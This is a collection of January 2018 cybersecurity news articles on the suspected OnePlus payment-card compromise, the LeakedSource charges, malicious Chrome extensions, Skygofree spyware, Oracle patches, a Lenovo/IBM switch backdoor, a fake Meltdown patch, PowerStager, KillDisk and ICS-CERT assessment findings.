A large number of OnePlus users claim to have been the victim of fraudulent credit card transactions after making purchases on the official website of the Chinese smartphone manufacturer.

Dozens of cases were reported through the support forum and on Reddit, the circumstance that credit cards had been compromised after customers bought a smartphone or some accessories from the OnePlus official website indicating suggest it was compromised by attackers.

“I purchased two phones with two different credit cards, first on 11-26-17 and second on 11-28-17. Yesterday I was notified on one of the credit cards of suspected fraudulent activity, I logged onto credit card site and verified that there were several transactions that I did not make” claims one of the victims. “The only place that both of those credit cards had been used in the last 6 months was on the Oneplus website.”

Security researchers at Fidus analyzed the payment page after reading the claims on the official forum and discovered that card details are hosted ON-SITE exposing data to attacks.

“We stepped through the payment process on the OnePlus website to have a look what was going on. Interestingly enough, the payment page which requests the customer’s card details is hosted ON-SITE.” reads a blog post published by Fidus. “This means all payment details entered, albeit briefly, flow through the OnePlus website and can be intercepted by an attacker. Whilst the payment details are sent off to a third-party provider upon form submission, there is a window in which malicious code is able to siphon credit card details before the data is encrypted.”

OnePlus%20Payment-Page-1024x579

The experts speculate the servers of the company website might have been compromised, likely the attackers exploited some flaws in the Magento eCommerce platform used by OnePlus.

There are two methods used by crooks to steal credit cards from Magento-based stores:

Using Javascript on client-side. The malicious JavaScript is hosted on the web page which causes the customer’s machine to silently send a crafted request containing the payment data to a server controlled by attackers. The researchers who analyzed the payment page on the OnePlus site did not find any malicious JavaScript being used.
The second method relies on the modification of the app/code/core/Mage/Payment/Model/Method/Cc.php file through a shell access to the server. The Cc.php file handles the saving of card details on the eCommerce website. Regardless if card details are actually saved or not, the file is called regardless. Attackers inject code into this file to siphon data.
OnePlus declared that it does not store any credit card data on its website and all payment transactions are carried out through a payment processing partner.

“At OnePlus, we take information privacy extremely seriously. Over the weekend, members of the OnePlus community reported cases of unknown credit card transactions occurring on their credit cards post purchase from oneplus.net. We immediately began to investigate as a matter of urgency, and will keep you updated. ” reads the statement published by the company.
“No. Your card info is never processed or saved on our website – it is sent directly to our PCI-DSS-compliant payment processing partner over an encrypted connection, and processed on their secure servers. “
“The Chinese smartphone maker also confirms that purchases involving third-party services like PayPal are not affected.”
OnePlus excluded that its website is affected by any Magento vulnerability, since 2014, it has entirely been re-built using custom code.


Canadian man charged over leak of billions hacked accounts through LeakedSource
17.1.2018 securityaffairs Hacking

A Canadian Man supposed to be the admin of the LeakedSource.com website was charged over the leak of 3 billion hacked accounts.
The Canadian man Jordan Evan Bloom (27) was charged with data leak of 3 billion hacked accounts, the man was running a website to collect personal data and login credentials from the victims.

The man was charged in December as part of an investigation dubbed “Project Adoration,” aiming at trafficking in personal data, unauthorized use of computers, and possession of an illicitly obtained property.

The RCMP alleges that Bloom was the administrators of the LeakedSource.com website.

According to a statement from the Royal Canadian Mounted Police, “Project Adoration” began in 2016, the investigation started after the Canadian police learned that LeakedSource.com was being hosted by servers located in Quebec.

The RCMP conducted the investigation along with The Dutch National Police and the FBI.

According to the Royal Canadian Mounted Police, Evan Bloom earned some 247,000 Canadian dollars (roughly $198,800 US) by selling the data via leakedsource.com.

“This investigation is related to claims about a website operator alleged to have made hundreds of thousands of dollars selling personal information,” said Rafael Alvarado, the officer in charge of the RCMP Cybercrime Investigative Team. “The RCMP will continue to work diligently with our domestic and international law enforcement partners to prosecute online criminality.”

The data was stolen during massive data breaches of popular websites such as LinkedIn and Ashley Madison online dating service.


Clearly, the availability of such kind of data exposes users at risk of identity theft especially if they share the same credentials on differed web services.

Law enforcement shut down Bloom’s website, unfortunately, another domain name operated by the man is still operating because it hosted on bulletproof servers in Russia.


Four malicious Chrome extensions affected over half a million users and global businesses
17.1.2018 securityaffairs
Virus

Four malicious Chrome extensions may have impacted more than half million users likely to conduct click fraud or black search engine optimization.
More than half million users may have been infected by four malicious Chrome extensions that were likely used to conduct click fraud or black search engine optimization.

According to ICEBRG, the malicious extensions also impacted employees of major organizations, potentially allowing attackers to gain access to corporate networks.

“Recently, ICEBRG detected a suspicious spike in outbound network traffic from a customer workstation which prompted an investigation that led to the discovery of four malicious extensions impacting a total of over half a million users, including workstations within major organizations globally.” states the analysis published by ICEBRG. “Although likely used to conduct click fraud and/or search engine optimization (SEO) manipulation, these extensions provided a foothold that the threat actors could leverage to gain access to corporate networks and user information.”

The researchers noticed an unusual spike in outbound traffic volume from a customer workstation to a European VPS provider. The analysis of the HTTP traffic revealed it was to the domain ‘change-request[.]info’ and was generated from a Chrome extension with ID ‘ppmibgfeefcglejjlpeihfdimbkfbbnm’ named Change HTTP Request Header that was available via Google’s Chrome Web Store.

Malicious%20Chrome%20Extensions

The extension does not contain any malicious code, but the combination of “two items of concern that” could allow attackers to inject and execute an arbitrary JavaScript code via the extension.

The experts highlighted that Chrome extensions are not allowed to retrieve JSON from an external source and execute JavaScript code they contain, but need to explicitly request its use via the Content Security Policy (CSP).

Once enable the ‘unsafe-eval’ (Figure 3) permission to retrieve the JSON from an external source the attacker can force the browser to execute malicious code.

“When an extension does enable the ‘unsafe-eval’ (Figure 3) permission to perform such actions, it may retrieve and process JSON from an externally-controlled server.” “This creates a scenario in which the extension author could inject and execute arbitrary JavaScript code anytime the update server receives a request.” continues the analysis.

The Change HTTP Request Header extension is able to download obfuscated JSON files from an external source (‘change-request[.]info’), by invoking the ‘update_presets()’ function.

The Chrome extension implemented an anti-analysis technique to avoid detection.

The extension checks the JavaScript for the presence of native Chrome debugging tools (chrome://inspect/ and chrome://net-internals/), and if detected, halts the injection of malicious code segment. The Chrome extension implemented an anti-analysis technique to avoid detection.

Once injected the code, the JavaScript creates a WebSocket tunnel with ‘change-request[.]info’ and uses it to proxy browsing traffic via the victim’s browser.

During the analysis, the experts observed that this feature was observed by threat actors for visiting advertising related domains likely to conduct click fraud scams.

“The same capability could also be used by the threat actor to browse internal sites of victim networks, effectively bypassing perimeter controls that are meant to protect internal assets from external parties.” continues the analysis.

The security experts discovered other Chrome extensions with a similar behavior and using the same C&C server.

Nyoogle – Custom Logo for Google
Lite Bookmarks
Stickies Chrome’s Post-it Notes


Powerful Skygofree spyware was reported in November by Lukas Stefanko and first analyzed by CSE CybSec
17.1.2018 securityaffairs Android

The Skygofree spyware analyzed by Kaspersky today was first spotted by the researcher Lukas Stefanko and the first analysis was published last year by the CSE Cybsec ZLab.
Security researchers at Kaspersky Lab have made the headlines because they have spotted a new strain of a powerful Android spyware, dubbed Skygofree, that was used to gain full control of infected devices remotely.

Skygofree is an Android spyware that could be used in targeted attacks and according to the experts it has infected a large number of users for the past four years.

The name Skygofree is not linked to Sky Go, which is the subsidiary of Sky and does not affect its services.

The malware has been in the wild at least since 2014, and it was improved several times over the years.

“At the beginning of October 2017, we discovered new Android spyware with several features previously unseen in the wild. In the course of further research, we found a number of related samples that point to a long-term development process. We believe the initial versions of this malware were created at least three years ago – at the end of 2014.” reads the analysis published by Kaspersky.

“Since then, the implant’s functionality has been improving and remarkable new features implemented, such as the ability to record audio surroundings via the microphone when an infected device is in a specified location; the stealing of WhatsApp messages via Accessibility Services; and the ability to connect an infected device to Wi-Fi networks controlled by cybercriminals.”

In this post, I’ll show you that the malware was first found by the security researcher at ESET Lukas Stefanko and the first detailed analysis of the spyware (titled “Malware Analysis Report: Fake 3MobileUpdater“) was published by the experts at the CSE Cybsec ZLab.


Lukas Stefanko
@LukasStefanko
The Android Italian Job 🇮🇹

Android Spy Trojan steals sensitive info from victims
Spreads in #Italy 🇮🇹 as fake telecommunication company @Tre_It
Remotely controlled, capable of: install apps, upload files, uses accessibility, take pics, record audio, get sms/location, XMPP...

10:02 AM - Nov 9, 2017
7 7 Replies 113 113 Retweets 110 110 likes
Twitter Ads info and privacy
According to Kaspersky, Skygofree has being distributed through fake web pages mimicking leading mobile network operators. The attackers registered some of the domains used in the attack since 2015.

The most recently observed domain was registered on October 31, 2017, according to Kaspersky data the malicious code was used against several infected individuals, exclusively in Italy.

The team of researchers at CSE CybSec ZLab analyzed in November a fake 3 Mobile Updater that was used pose itself as a legitimate application of the Italian Telco company, TRE Italia.

“The most classic and efficient method used to lure the users is to believe that the application does something good. This is just what 3 Mobile Updater does. In fact, this malicious Android application looks like a legitimate app used to retrieve mobile system update and it improperly uses the logo of the notorious Italian Telco company, TRE Italia, in order to trick victims into trusting it.” reads the report published by CSE CybSec.

Tre%20android%20malware

The analysis conducted by Kaspersky suggests the involvement of an Italian firm due to the presence in the code of strings in Italian.

“As can be seen from the comparison, there are similar strings and also a unique comment in Italian, so it looks like the attackers created this exploit payload based on android-rooting-tools project source code.” states Kaspersky.

The CSE CybSec researchers arrived atthe same conclusion, below a portion of the code analyzed by the members of the ZLab.

Skygofree%20linked%20to%20fake%203%20updater

“Moreover, both in the logcat messages and in the code, the malware writers used the Italian language. So, we can say with high confidence that this malicious app has been written by an Italian firm that intended to target users of the Italian telco company Tre.” CSE wrote in the analysis.

The artifacts analyzed by Kaspersky in the malware code and information gathered on the control infrastrucure suggest the developer of the Skygofree implants is an Italian IT company that works for surveillance solutions.

Skygofree

Kaspersky Lab has not confirmed the name of the Italian company behind this spyware, we at the CSE CybSec ZLab opted for the same decision in October due to the possible involvement of law enforcement or intelligence Agencies.

Unfortunately, the OPsec implemented by the firm is very poor. The name of the company is present in multiple reference of the code. Not only, one of the domains used to control registered by the attacker is linked to an Italian technology company.

“Although the security firm has not confirmed the name of the Italian company behind this spyware, it found multiple references to Rome-based technology company “Negg” in the spyware’s code. Negg is also specialized in developing and trading legal hacking tools.” states the blog post published by THN.

Once installed, Skygofree hides its icon and starts background services to conceal its malicious actions from the victim, one interesting feature implemented by the malicious code prevents its services from being killed.

“Interestingly, a self-protection feature was implemented in almost every service. Since in Android 8.0 (SDK API 26) the system is able to kill idle services, this code raises a fake update notification to prevent it” continues Kaspersky.

According to Kaspersky, the Skygofree malware was enhanced since October implementing a sophisticated multi-stage attack and using a reverse shell payload.

The malicious code includes multiple exploits to escalate privileges for root access used by attackers to execute sophisticated payloads, including a shellcode used to spy on popular applications such as Facebook, WhatsApp, Line, and Viber.

The same spying abilities were implemented in the app we analyzed at the CSE CybSec.

“The capabilities of this malicious app are enormous and include the information gathering from various sources, including the most popular social apps, including Whatsapp, Telegram, Skype, Instagram, Snapchat. It is able to steal picture from the gallery, SMS and calls registry apps. All this data is first stored in a local database, created by the malicious app, and later it is sent to the C2C.” reads the preliminary analysis published on SecurityAffairs.

“There are multiple, exceptional capabilities: usage of multiple exploits for gaining root privileges, a complex payload structure, [and] never-before-seen surveillance features,” the researchers said.

Skygofree is able to take pictures and videos remotely, monitor SMS, call records and calendar event, of course, it also able to gather target’ location and access any information stored on the mobile.

Skygofree also can record audio via the microphone, the attacker can also force the victim’s device to connect to compromised Wi-Fi networks it controls in order to conduct man-in-the-middle attacks.

Kaspersky also found a variant of Skygofree targeting Windows users, a circumstance that suggests the same company is also targeting machines running Windows OS.

The best way to prevent yourself from being a victim is to avoid downloading apps via third-party websites, app stores or links provided in SMS messages or emails.

Comparative analysis fake 3 Mobile Updater vs SkyGoFree

I asked my colleague Dr. Antonio Pirozzi, Director of the CSE CybSec ZLab, to compare the stubs of code shared by Kaspersky with the ones related to the code we analyzed back in November.

This is what has emerged:

These classes are identical:

SkyGoFree%20comparison

The spyware we analyzed did not contain the Android exploits found by Kaspersky, as well as the reverse shell PRISM and the busy box.
The class used for parsing are similar;

The DNS used are the same;

The IoCs published by Kaspersky includes the URL of the C&C (url[.] plus) which was the same of the Spyware analyzed by CSE CybSec.
Conclusion

Many parts of the code are identical, both source codes include strings in Italian and the reference to the Italian firms are the same. The version analyzed by Kaspersky is a new version of the malware analyzed by CSE CybSec ZLab.
Kaspersky also shared the URL from which the spyware is downloaded and one of them was related to the version we analyzed (Fake 3 mobile updater).
The two version of the malware shared numerous classes, C&C server, Whois records and many other info. The sample analyzed by CSE was probably still under development.


Oracle Fixes Spectre, Meltdown Flaws With Critical Patch Update
17.1.2018 securityweek
Vulnerebility

Oracle on Tuesday released its first Critical Patch Update for 2018 to deliver 237 new security fixes across its product portfolio. Over half of the addressed vulnerabilities could be remotely exploited without authentication.

As part of the January 2018 Critical Patch Update, Oracle released fixes for the Critical processor vulnerabilities made public in the beginning of the year, namely Spectre and Meltdown. Impacting modern processors, the bugs put billions of devices at risk, and vendors have been working hard to address them over the past several weeks.

“The January 2018 Critical Patch Update provides fixes for certain Oracle products for the Spectre (CVE-2017-5753, CVE-2017-5715) and Meltdown (CVE-2017-5754) Intel processor vulnerabilities,” Oracle notes in its advisory. Specific details, however, are included in a separate note, accessible only to its customers.

The security updates Oracle released for the Sun Systems Products Suite also include a fix for Oracle X86 Servers to address the CVE-2017-5715 Spectre flaw. The fix “includes Intel microcode that enables OS and VM level mitigations,” but the patch is necessary only for servers using non Oracle OS and Virtualization software.

“Oracle OS and Oracle VM patches for CVE-2017-5715 will include updated Intel microcode,” the company said.

A patch for the same bug was also included in the security updates for Oracle VM VirtualBox.

An article from The Register claims that Oracle admitted in a document on its customer portal that Solaris on SPARCv9 might be impacted by the Spectre flaws. The company reportedly said that patches are being developed, but didn’t provide information on when they would be released or on the performance impact they might have.

The product with the largest number of fixes in the January 2018 Critical Patch Update is Financial Services Applications, at 34 patches. 13 of the flaws could be remotely exploitable without authentication.

Fusion Middleware was the second most impacted Oracle product, at 27 fixes (21 of the bugs being remotely exploitable without authentication), followed by MySQL (25 fixes – 6 remotely exploitable bugs), and Java SE (21 – 18) and Hospitality Applications (21 – 15).

Oracle also resolved bugs in PeopleSoft Products (15 – 8), Supply Chain Products Suite (14 – 12), Virtualization (14 – 3), Sun Systems Products Suite (13 – 7), Retail Applications (11 – 8), Communications Applications (10 – 8), Health Sciences Applications (7 – 5), E-Business Suite (7 – 4), Database Server (5 – 3), Hyperion (4 – 1), Support Tools (3 – 1), JD Edwards Products (2 – 2), Siebel CRM (2 – 0), Construction and Engineering Suite (1 – 0), and Java Micro Edition (1 – 0).

Affecting Apache Log4j, CVE-2017-5645 was the vulnerability with the largest number of occurrences in this set of patches, at 21. It affects Communications Applications, WebLogic Server, PeopleSoft Products, Retail Applications, and Supply Chain Products Suite.

The vulnerability with the highest CVSS score (10) was addressed in Sun ZFS Storage Appliance Kit (AK). The most commonly encountered Critical vulnerabilities had a CVSS score of 9.8. Over 20 such flaws were found in Communications Applications, Fusion Middleware, PeopleSoft, Retail Applications, and Virtualization products.


Backdoor Found in Lenovo, IBM Switches
17.1.2018 securityweek
Virus

A high severity vulnerability described as a backdoor has been patched in several Flex System, RackSwitch and BladeCenter switches from Lenovo and IBM.

The flaw, tracked as CVE-2017-3765, affects the Enterprise Network Operating System (ENOS) running on affected devices. The vulnerability allows an attacker to gain access to the management interface of a switch.

“An authentication bypass mechanism known as ‘HP Backdoor’ was discovered during a Lenovo security audit in the Telnet and Serial Console management interfaces, as well as the SSH and Web management interfaces under certain limited and unlikely conditions,” Lenovo said in its advisory.

“This bypass mechanism can be accessed when performing local authentication under specific circumstances using credentials that are unique to each switch. If exploited, admin-level access to the switch is granted,” the company added.

ENOS is the operating system that powers Lenovo’s RackSwitch and Flex System embedded switches. ENOS was initially developed by Nortel’s Blade Server Switch Business Unit (BSSBU), which spun off in 2006 to become BLADE Network Technologies (BNT). IBM acquired BNT in 2010 and in 2014 sold it to Lenovo.

The problematic feature, introduced by Nortel in 2004 at the request of a customer, can be found in Lenovo devices and IBM Flex System, BladeCenter and RackSwitch switches that still use the ENOS firmware.

Lenovo patched the security hole with the release of ENOS 8.4.6.0 and also provided workarounds. The company says devices running the CNOS (Cloud Network Operating System) firmware are not vulnerable. IBM has also released firmware updates to fix the vulnerability in impacted switches.

Lenovo pointed out that the backdoor can only be exploited under specific circumstances.

“Lenovo is not aware of this mechanism being exploited, but we assume that its existence is known, and customers are advised to upgrade to firmware which eliminates it,” Lenovo said.


World Economic Forum Publishes Cyber Resiliency Playbook
17.1.2018 securityweek Cyber

World Economic Forum Publishes Playbook for Developing Cyber Resiliency Through Public/Private Collaboration

The World Economic Forum (WEF) has released a playbook for public-private collaboration to improve cyber resiliency ahead of the launch of a new Global Centre for Cybersecurity at the Annual Meeting 2018 taking place on January 23-26 in Davos, Switzerland.

The background to the WEF playbook is the complexity and sometimes conflicting requirements for governments to provide physical and cyber security for their citizens without unnecessarily intruding on personal privacy, and without damaging legitimate multinational businesses. Success, it claims, "depends on collaboration between the public and private sectors."

Word Economic Forum LogoThere are two sections to the playbook: a reference architecture for public-private collaboration, and cyber policy models. There is no attempt to provide a global norm in this process, nor a methodology for implementing individual policy models. It is an intra-country model, and implementation will depend upon each nation's unique values.

Fourteen separate policy topics are included, ranging from research and data sharing, through attribution, encryption, and active defense to cyber-insurance. Five key themes cross these topics: a clearly defined safe harbor for data sharing; legal clarity for the work of white hat researchers; the impact of a symmetrical international policy response; the cost and effect of compliance requirements; and software coding quality standards.

Each policy topic is then analyzed in relation to five areas: security, privacy, economic value, accountability and fairness. It is important at this point to note that the playbooks are designed for governments to develop public/private co-operation -- civil society issues are not seriously discussed.

For example, the first policy model deals with potential government approaches to zero-day vulnerabilities. The life-cycle of a zero-day comprises unknown existence in code; discovery; and exploitation and mitigation. While secure coding practices can limit the occurrence of zero-days, they "will continue to exist due to human error and other factors." Therefore, there needs to be a government policy towards zero-days.

The two primary options are for governments to "completely exit the zero-day market and avoid research dedicated to finding software vulnerabilities;" or to stockpile for own use, and/or disclose to vendors. The implications of the latter option are then discussed. Stockpiling without disclosure increases the likelihood that bad actors might also independently discover the vulnerability. Purchasing zero-days weakens the bug bounty programs since researchers are likely to sell to the highest bidder -- which is likely to be government.

The effect of a zero-day policy is then related to the five security areas. Increased exploitation of zero-days will hurt commerce (economy) and result in more breaches (privacy). Increased research and more sharing will be beneficial (security); while the sharing of zero-days applies pressure on vendors to more rapidly mitigate the vulnerabilities (accountability). Fairness is not implicated in the different policy choices

This basic model of analyzing the policy topic, and then discussing the trade-offs with each of the five security areas (and their interaction) is applied to each of the 14 discussed policy topics. For example, 'active defense' is first defined to range from "technical interactions between a defender and an attacker" to "reciprocally inflicting damage on an alleged adversary".

One obvious danger is the potential for retaliatory escalation. "Responding to a nation-state adversary may trigger significant collateral obligations for a host state of would-be active defenders," warns the playbook. "As such, policy-makers may consider curtailing attempts to attack nation-states. Policy-makers might also consider curtailing the use of active defence techniques against more sophisticated non-state adversaries, as those adversaries may have a greater ability to obfuscate their identity and dangerously escalate a conflict."

The trade-offs on an active defense policy are then related to the five security areas. Expansive use of active defense will increase costs without necessarily having an economic return (economy). It would diminish privacy for both the alleged adversary and for any third-party collateral damage organizations (privacy). Any actual effect on overall security will likely depend upon its effectiveness as a deterrent (security). Only larger companies, and especially nation-backed industries such as the defense sector will likely have the means to employ active defense (fairness); but it is only a realistic option with more accurate attribution (accountability).

The intention of the playbook is simple, despite the thoroughness and complexity of its content. "The frameworks and discussions outlined in this document," it concludes, "endeavour to provide the basis for fruitful collaboration between the public and private sectors in securing shared digital spaces."

"We need to recognize cybersecurity as a public good and move beyond the polarizing rhetoric of the current security debate. Only through collective action can we hope to meet the global challenge of cybersecurity," said Daniel Dobrygowski, Project Lead for Cyber Resilience at the World Economic Forum.

While public/private dialog on security will of necessity be led by individual governments, the document provides an excellent overview of many of the security issues faced by commercial security teams. Although it contains no technical detail on security problems, it provides a detailed picture of the different implications from different approaches to the main security issues faced by all companies today.


Fake Meltdown/Spectre Patch Installs Malware
17.1.2018 securityweek
Virus

Cybercriminals are already taking advantage of the massive attention the recently detailed Meltdown and Spectre CPU flaws have received, in an attempt to trick users into installing malware instead, Malwarebytes warns.

Made public in early January, Meltdown and Spectre are two new side-channel attack methods against modern processors and are said to impact billions of devices. Based on vulnerabilities at the CPU level, the flaws allow malicious apps to access data as it is being processed, including passwords, photos, documents, emails, and the like.

Chip makers and vendors were alerted on the bugs last year, and some started working on patches for their users several months ago, but waited for a coordinated public disclosure set for last week. Apple, Microsoft, Google, Canonical, and IBM are just a few of the vendors that have already deployed patches.

Soon after the patches began rolling out, however, attacks taking advantage of the Meltdown/Spectre fever surfaced. One of them, Malwarebytes reports, is targeting German users with the SmokeLoader malware.

The attack was spotted soon after the German authorities issued a warning on phishing emails trying to take advantage of infamous bugs started to appear.

The emails appeared to come from the German Federal Office for Information Security (BSI), and Malwarebytes discovered a domain that also posed as the BSI website. Recently registered, the SSL-enabled phishing site isn’t affiliated with a legitimate or official government entity, but attempts to trick users into installing malware.

The website is offering an information page that supposedly provides links to resources about Meltdown and Spectre, bug also links to a ZIP archive (Intel-AMD-SecurityPatch-11-01bsi.zip) that contains malware instead of the promised security patch.

Once a user downloads and runs the file, the SmokeLoader malware, which is capable of downloading and running additional payloads, is installed. The security researchers have observed the threat attempting to connect to various domains and sending encrypted information.

By analyzing the SSL certificate used by the fraudulent domain, the security researchers discovered other properties associated with the .bid domain, including a German template for a fake Adobe Flash Player update.

The security researchers have already contacted Comodo and CloudFlare to report the fraudulent website, and the domain stopped resolving within minutes after CloudFlare was informed on the issue.

“Online criminals are notorious for taking advantage of publicized events and rapidly exploiting them, typically via phishing campaigns. This particular one is interesting because people were told to apply a patch, which is exactly what the crooks are offering under disguise,” Malwarebytes concludes.


"PowerStager" Tool Employs Unique Obfuscation
17.1.2018 securityweek
Virus

A malicious tool that has managed to fly under the radar since April 2017 is showing great focus on obfuscation, in an attempt to evade detection, Palo Alto Networks warns.

Dubbed PowerStager, the tool has shown an uptick in usage for in-the-wild attacks around December 2017. Developed as a Python script that generates Windows executables using C source code, it uses multiple layers of obfuscation to launch PowerShell scripts to execute a shellcode payload.

PowerStager uses a unique obfuscation technique for PowerShell segments, while also offering increased flexibility, due to multiple configuration options.

Some of these options include the ability to target both x86 and x64 platforms, support for additional obfuscation on top of defaults, support for customized error messages/executable icon for social engineering, and the ability to use Meterpreter or other built-in shellcode payloads. The tool can also fetch remote payloads or embed them into the executable and can escalate privileges using UAC.

Analysis of executables created with the help of this tool revealed that they were being generated programmatically and that an embedded string for the file that gets created was included in each executable, Palo Alto’s Jeff White explains. The filename is also randomized between samples.

White discovered seven total PowerShell scripts that can be generated from the script.

As of late December 2017, Palo Alto has observed 502 unique samples of PowerStager, mainly targeting Western European media and wholesale organizations. A large number of samples, however, were being used for testing and sales proof-of-concepts demonstrations, the researcher says.

White also discovered that certain attributes that PowerStager defines when building the samples can be used to track them. There are also a series of characteristics specific to the generated samples. Although they are usually different between samples, they can prove useful for identification, especially when coupled with said unique obfuscation and PowerShell methods during dynamic analysis.

“While it’s not the most advanced toolset out there, the author has gone through a lot of trouble in attempting to obfuscate and make dynamic detection more difficult. PowerStager has covered a lot of the bases in obfuscation and flexibility well, but it hasn’t seen too much usage as of yet; however, it is on the rise and another tool to keep an eye on as it develops,” White concludes.


New KillDisk Variant Spotted in Latin America
17.1.2018 securityweek
Virus

A new variant of the disk-wiper malware known as KillDisk has been spotted by Trend Micro researchers in attacks aimed at financial organizations in Latin America.

The security firm is in the process of examining the new variant and the attacks, but an initial analysis showed that the Trojan appears to be delivered by a different piece of malware or it may be part of a bigger attack.

Early versions of KillDisk were designed to wipe hard drives in an effort to make systems inoperable. The malware was used by the Russia-linked threat actor BlackEnergy in the 2015 attack aimed at Ukraine’s energy sector.

Roughly one year after the Ukraine attack, researchers reported that its developers had turned KillDisk into file-encrypting ransomware. However, the samples analyzed at the time used the same encryption key for all instances, making it possible for victims to recover files.

Experts later reported seeing a KillDisk ransomware designed to target Linux machines, but the malware did not save encryption keys anywhere, making it impossible to recover files.

Some links have also been found between KillDisk and the NotPetya malware, which initially appeared to be a piece of ransomware but later turned out to be a disk wiper. NotPetya hit machines in more than 65 countries and major companies reported losing hundreds of millions of dollars as a result of the attack.

The latest variant, which Trend Micro tracks as TROJ_KILLDISK.IUB, goes back to its roots and focuses on deleting files and wiping the disk. The malware, designed to target Windows systems, goes through all drives in order to delete files, except for system files and folders.

It then proceeds to wipe the disk, which includes reading the master boot record (MBR) and overwriting the extended boot record (EBR). The file removal and disk wiping procedures involve overwriting files and disk sectors in order to make recovery more difficult.

Once files and partitions have been deleted and overwritten, the malware attempts to terminate several processes in an effort to reboot the infected machine. By targeting processes associated with the client/server runtime subsystem (csrss.exe), Windows start-up (wininit.exe), Windows logon (winlogon.exe), and the Local Security Authority Subsystem Service (lsass.exe), the malware can force a blue screen of death (BSOD), a logout, or a restart.

Trend Micro has promised to share more information on the new KillDisk variant as its investigation continues.


Half Million Impacted by Four Malicious Chrome Extensions
17.1.2018 securityweek
Virus

Four malicious Chrome extensions managed to infect over half a million users worldwide, including employees of major organizations, ICEBRG reports.

The extensions were likely used to conduct click fraud and/or search engine optimization (SEO) manipulation, but they could have also been used by threat actors to gain access to corporate networks and user information, the security company warns.

The malicious extensions were discovered after observing an unusual spike in outbound traffic volume from a customer workstation to a European VPS provider, ICEBRG reveals. The HTTP traffic was associated with the domain ‘change-request[.]info’ and was generated from a Chrome extension named Change HTTP Request Header.

While the extension itself does not contain “any overtly malicious code,” the researchers discovered the combination of “two items of concern that” could result in the injection and execution of arbitrary JavaScript code via the extension.

Chrome can execute JavaScript code contained within JSON but, due to security concerns, extensions aren’t allowed to retrieve JSON from an external source, but need to explicitly request its use via the Content Security Policy (CSP).

When the permission is enabled, however, the extension can retrieve and process JSON from an externally-controlled server, which allows extension authors to inject and execute arbitrary JavaScript code when the update server receives a request.

What ICEBRG researchers discovered was that the Change HTTP Request Header extension could download obfuscated JSON files from ‘change-request[.]info’, via an ‘update_presets()’ function. The obfuscated code was observed checking for native Chrome debugging tools and halting the execution of the infected segment if such tools were detected.

After injection, the malicious JavaScript creates a WebSocket tunnel with ‘change-request[.]info’ and uses it to proxy browsing traffic via the victim’s browser.

“During the time of observation, the threat actor utilized this capability exclusively for visiting advertising related domains indicating a potential click fraud campaign was ongoing. Click fraud campaigns enable a malicious party to earn revenue by forcing victim systems to visit advertising sites that pay per click (PPC),” ICEBRG reports.

The capability, however, can also be used by the threat actor to browse internal sites of victim networks, thus effectively bypassing perimeter controls.

The security researchers also discovered that Change HTTP Request Header wasn’t the only Chrome extension designed to work in this manner. Nyoogle - Custom Logo for Google, Lite Bookmarks, and Stickies - Chrome's Post-it Notes show similar tactics, techniques, and procedures (TTPs) and feature the same command and control (C&C).

The Stickies extension was also observed using a different code injection pathway, but injecting JavaScript code nearly identical to that of other malicious extensions. It appears that the extension has a history of malicious behavior, as it was observed in early 2017 to be using the new code injection technique following an update.

“The inherent trust of third-party Google extensions, and accepted risk of user control over these extensions, allowed an expansive fraud campaign to succeed. In the hands of a sophisticated threat actor, the same tool and technique could have enabled a beachhead into target networks,” ICEBRG notes.

Considering the total installed user base of these malicious Chrome extensions, the malicious actor behind them has a substantial pool of resources to use for financial gain. Google, the National Cyber Security Centre of The Netherlands (NCSC-NL), the United States Computer Emergency Readiness Team (US-CERT), and customers who were directly impacted have been alerted on the issue.


Canadian Man Charged Over Leak of Three Billion Hacked Accounts
17.1.2018 securityweek Hacking

An Ontario man made his first court appearance Monday to answer charges of running a website that collected personal and password data from some three billion accounts, and sold them for profit.

Jordan Evan Bloom, 27, of Thornhill earned some Can$247,000 ($198,800 US) by selling the data for a "small fee" via leakedsource.com, the Royal Canadian Mounted Police said in a statement.

The information was stolen during massive hacks of websites including LinkedIn and the Ashley Madison online dating service.

Some of the data could also be used to access other popular websites if the hacked user used the same password and username combination, according to police.

Bloom was charged in December as part of a criminal probe dubbed "Project Adoration" focusing on trafficking in personal data, unauthorized use of computers, and possession of illicitly obtained property.

The probe lasted more than a year.

Authorities have shut down Bloom's website, but another with the same domain name hosted by servers in Russia is still operating.

"The RCMP will continue to work diligently with our domestic and international law enforcement partners to prosecute online criminality," inspector Rafael Alvarado said in a statement.

Police noted that help from the Dutch National Police and the FBI were "essential" to the investigation.


Shared Accounts Increasingly Problematic for Critical Infrastructure: ICS-CERT
17.1.2018 securityweek ICS

Assessments conducted last year by the U.S. Department of Homeland Security’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) showed that boundary protection remains the biggest problem in critical infrastructure organizations, but identification and authentication issues have become increasingly common.

Critical infrastructure owners and operators can ask ICS-CERT to conduct onsite cybersecurity assessments of their industrial control systems (ICS) in order to help them strengthen their cybersecurity posture.

In 2017, ICS-CERT conducted 176 assessments, which represents a 35 percent increase compared to the previous year. The agency analyzed organizations in eight critical infrastructure sectors, but more than two-thirds of the assessments targeted the energy and water and wastewater systems sectors.

The highest number of assessments were conducted in Texas (27), followed by Alaska (20), Nebraska (15), New York (14), Washington (13), Idaho (12), Nevada (10) and Arizona (10).

ICS-CERT identified 753 issues as part of 137 architecture design reviews and network traffic analyses. The six most common weaknesses, which accounted for roughly one-third of the total, were related to network boundary protection, identification and authentication, allocation of resources, physical access controls, account management, and least functionality.

Security%20issues%20found%20during%20ICS-CERT%20assessments

Improper network boundary protection, which includes inadequate boundaries between enterprise and ICS networks and the inability to detect unauthorized activity on critical systems, has been the most common type of weakness since 2014.

As for identification and authentication issues, these can include the lack of mechanisms for tracing user actions if an account gets compromised, and increased difficulty in securing accounts belonging to former employees, particularly ones with administrator access.

Identification and authentication issues first made ICS-CERT’s top six weakness categories in 2015, when it was on the fourth position. In 2016 it jumped one position and last year it was the second most common security weakness.

Of all the identification and authentication issues, shared and group accounts are particularly concerning.

“[Shared and group accounts] make it difficult to identify the actual user and they allow malicious parties to use them with anonymity. Accounts used by a shared group of users typically have poor passwords that malicious actors can easily guess and that users do not change frequently or when a member of the group leaves,” ICS-CERT said in its latest Monitor report.

Allocation of resources for cybersecurity is also a problem in many critical infrastructure organizations. ICS-CERT’s assessment teams noticed that many sites are short-staffed and in many cases there is no backup personnel.

“Although some sites had started planning or attrition of staff, many did not have a plan to address loss of key personnel. One site had seven key personnel, four of whom would be eligible for retirement next year,” the agency said.

While its assessments do not focus on physical access controls, ICS-CERT has often noticed that organizations fail to ensure that ICS components are physically accessible only to authorized personnel.

